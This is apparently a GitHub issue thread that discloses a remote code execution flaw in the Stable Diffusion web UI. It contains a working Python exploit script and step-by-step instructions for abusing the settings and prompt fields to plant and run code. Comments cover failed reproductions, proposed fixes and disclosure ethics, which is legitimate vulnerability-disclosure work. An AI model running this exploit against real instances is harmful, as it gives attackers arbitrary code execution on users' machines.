AUTOMATIC1111/stable-diffusion-webui

Security: RCE danger in scripts.py

Closed this issue · 23 comments

description

any file in scripts folder will be compile and execute automatically, which will cause remote code execution.

a simple exp

import requests

url = 'your service url'
api = '/api/predict/'

true = True
false = False
null = None

# create a hypernetwork named '''#
s = requests.Session()
r = s.post(url + api, json = {"fn_index":49,"data":["'''#",["768","320","640","1280"]],"session_hash":"9t0nm9ja8a6"})
print(r.text)

# use hypernetwork '''#
# check "Create a text file next to every image with generation parameters."
# redirect images output dir to "./scripits"
data = {"fn_index":147,"data":[true,"png","",true,"png",false,true,-1,true,true,false,80,true,false,true,false,"scripts","outputs/txt2img-images","outputs/img2img-images","outputs/extras-images","","outputs/txt2img-grids","outputs/img2img-grids","log/images",false,false,false,"",8,192,8,["R-ESRGAN x4+","R-ESRGAN x4+ Anime6B"],192,8,100,null,null,0.5,false,8,false,true,false,""," ",100,null,"'''#",1,false,false,false,false,true,false,true,20,false,1,[],"sd_model_checkpoint",false,true,false,1,24,48,1500,0.5,true,false,true,true,0,true,false,true,false,"",true,true,true,[],0,1,"uniform",0,0,1,0],"session_hash":"9t0nm9ja8a6"}

r = s.post(url + api, json = data)
print(r.text)

# generate a image with evil prompt
r = s.post(url + api, json = {"fn_index":13,"data":["import os; os.system(\"ls\"); open('exptest','w').write('gg');'''","","None","None",1,"Euler a",false,false,1,1,11,-1,-1,0,0,0,false,64,64,false,false,0.7,"None",false,false,null,"","Seed","","Nothing","",true,true,false,null,"",""],"session_hash":"3wyvvkx5xrb"})
print(r.text)

# restart gradio to load our scripts
r = s.post(url + api, json = {"fn_index":57,"session_hash":"d8pr218tdaw"})
print(r.text)

this exp worked on commit 08b3f7a

image

what the exp did

  1. Goto 'Train' tab 'Create hypernetwork', enter '''# as hypernetwork's name and create it.
    image

  2. Goto 'Settings' tab, check 'Create a text file next to every image with generation parameters.'
    image

  3. Set 'Output directory for images; if empty, defaults to three directories below' to 'scripts'
    image

  4. Switch hypernetwork to '''# (we just created in step 1)
    image

  5. Click 'Apply settings'
    image

  6. Goto 'txt2img' tab, input any code you want to execute, ends with ''', then click 'Generate'
    image

  7. Goto 'Settings' tab, click 'Restart Gradio and Refresh components (Custom Scripts, ui.py, js and css only)'
    image

fix suggestions

add file extension check in function load_scripts at https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/master/modules/scripts.py#L54

Aren't those scripts by design should execute on their own, are they?
It's like downloading a DLL file, put it to any graphic editor "Plugins" folder (for example) and then wondering, why those files gets executed?

add file extension check

How it would solve the problem? Why there is anything other than .py scrips there?
But, checking the extension looks sane to me.

Aren't those scripts by design should execute on their own, are they? It's like downloading a DLL file, put it to any graphic editor "Plugins" folder (for example) and then wondering, why those files gets executed?

add file extension check

How it would solve the problem? Why there is anything other than .py scrips there? But, checking the extension looks sane to me.

the problem is, if you shared your webui on the Internet, I can execute any python code in your computer. I don't need you to put any thing in the scripts folder.

There is a setting can change images output directory. Change it to "scripts" will let webui automatically save the image and a promt text file to the scripts folder

In my example, I launched a pure webui just pulled from github, and executed 'ls' command remotely.

BTW, if you changed output folder to "javascripts" will lead to a DoS attack, there is a similar problem in https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/master/modules/ui.py#L1619

Hmm, are you able to put there ANY custom path, saving images on any folder on target computer?

If so, it is a problem on its own now…

Rather than check for the extension of scripts/*, it seems that fn_index 147 could be set to be an arbitrary path and use the prompts to write some text files there. Maybe adding authentication, or force path prefix & sanitizing input would help?

How about having a database with hashes of files, that can only be edited by localhost, defaulting everything to disabled until the user sets specific files as enabled?

I don't think I'd trust just the suggestion of checking for a .py extension for anything other that an emergency stopgap measure. fn_index 147 (can't match it up with anything in this repo, and I'm not familiar with gradio) seems like a particular problem here. Highly suggest, if you don't generate the path yourself, whitelisting the allowable path characters (probably limit it to ascii numbers and digits).

It is indeed an emergency stopgap, I think the root problem is 'Settings' tab shound not be accessed by unauthorized, but I'm not familar with gradio too, I dont know how to fix it.
fn_index 147 is the 'Apply settings' button actually, I have updated the detail of exp in this issue.

The easy way out is to ask everyone to use --gradio-auth.

The exploit isn't working

{"error":null}
{"data":[false],"is_generating":false,"duration":0.0002467632293701172,"average_duration":0.00439375638961792}
{"error":null}
{"error":null}
Traceback (most recent call last):
  File "/usr/local/lib/python3.7/dist-packages/gradio/routes.py", line 276, in run_predict
    fn_index, raw_input, username, session_state, iterators
  File "/usr/local/lib/python3.7/dist-packages/gradio/blocks.py", line 784, in process_api
    inputs = self.preprocess_data(fn_index, inputs, state)
  File "/usr/local/lib/python3.7/dist-packages/gradio/blocks.py", line 679, in preprocess_data
    processed_input.append(block.preprocess(raw_input[i]))
  File "/usr/local/lib/python3.7/dist-packages/gradio/components.py", line 530, in preprocess
    return self._round_to_precision(x, self.precision)
  File "/usr/local/lib/python3.7/dist-packages/gradio/components.py", line 492, in _round_to_precision
    return float(num)
TypeError: float() argument must be a string or a number, not 'list'
Traceback (most recent call last):
  File "/usr/local/lib/python3.7/dist-packages/gradio/routes.py", line 276, in run_predict
    fn_index, raw_input, username, session_state, iterators
  File "/usr/local/lib/python3.7/dist-packages/gradio/blocks.py", line 784, in process_api
    inputs = self.preprocess_data(fn_index, inputs, state)
  File "/usr/local/lib/python3.7/dist-packages/gradio/blocks.py", line 679, in preprocess_data
    processed_input.append(block.preprocess(raw_input[i]))
  File "/usr/local/lib/python3.7/dist-packages/gradio/components.py", line 1096, in preprocess
    return self.choices.index(x)
ValueError: False is not in list
Traceback (most recent call last):
  File "/usr/local/lib/python3.7/dist-packages/gradio/routes.py", line 276, in run_predict
    fn_index, raw_input, username, session_state, iterators
  File "/usr/local/lib/python3.7/dist-packages/gradio/blocks.py", line 784, in process_api
    inputs = self.preprocess_data(fn_index, inputs, state)
  File "/usr/local/lib/python3.7/dist-packages/gradio/blocks.py", line 679, in preprocess_data
    processed_input.append(block.preprocess(raw_input[i]))
TypeError: 'NoneType' object is not subscriptable

Has this been fixed? I tried replicating the steps manually and nothing happened.

The exploit isn't working

{"error":null}
{"data":[false],"is_generating":false,"duration":0.0002467632293701172,"average_duration":0.00439375638961792}
{"error":null}
{"error":null}

this exp is just a demo, only work at revision 08b3f7a, because fn_index are different by versions.

Has this been fixed? I tried replicating the steps manually and nothing happened.

revision 36a0ba3 still exploitable, have tested on google colab.

Following the manual steps in the webui does not yield any results on revision 36a0ba3

There is an easy fix without changing any code.
Remove the write permission of "scripts" folder in your OS.
In Windows, right click on "scripts" folder and go to properties. Switch to Security Tab, set the "write" permission for Administrators and Users account to "Deny". I've tested it, it works.
In Linux, use chmod command to set "scripts" folder to read only. For example:
sudo chmod 555 scripts
This should set "scripts" folder with read and execute only. I haven't tested it.

Following the manual steps in the webui does not yield any results on revision 36a0ba3

Try close --gradio-debug if you enabled it. This option will make main thread blocked and gradio restart won't work.

The Gradio team seems to be attempting to get some fixes out for the security issues: gradio-app/gradio#2470

People are also reporting that individuals have been able to guess the gradio links and start generating their own content:

There's also a Reddit thread about the issue: https://www.reddit.com/r/StableDiffusion/comments/y56qb9/security_warning_do_not_use_share_in/

It really is the responsibility of the the application to ensure their users safety, and that means taking into account the security implications of a easily guessable domain. It's good that Gradio is making instances more difficult to find, however, they have no responsibility for the remote code execution vulnerability (that I'm aware of).

Has this even been addressed by project leaders here? Is Automatic aware of the situation?

23 days ago: #920
13 days ago: #1576

  • Is there any plan to notify users who might be affected by this?
  • Is there a plan in place to identify and quickly respond to vulnerabilities going forward?
  • Without a security policy in place, there is not a channel for people to communicate and address security issues without posting up a full disclosure as @ihopenot has done.

@ihopenot Can you explain your perspective in taking the action of posting up the exploit? Did you take any efforts to address this through back-channels? What were your initial points of reference that this was something to investigate?

Easy fix is just to use multiple nginx proxies with auth and for example hard to guess password like oralc**shot

Has this been fixed? I tried replicating the steps manually and nothing happened.

revision 36a0ba3 still exploitable, have tested on google colab.

Any recommendations on actions for users to take in case they were exploited?

Has this been fixed? I tried replicating the steps manually and nothing happened.

revision 36a0ba3 still exploitable, have tested on google colab.

Any recommendations on actions for users to take in case they were exploited?

If you are running a public service, enable the hide_ui_dir_config should be fine (but it also restricts some features).

bringing this back to top once more...9 months later and given the steadily increase in use of a1111 this issue is not getting smaller if it still persists unpatched or unmoderated.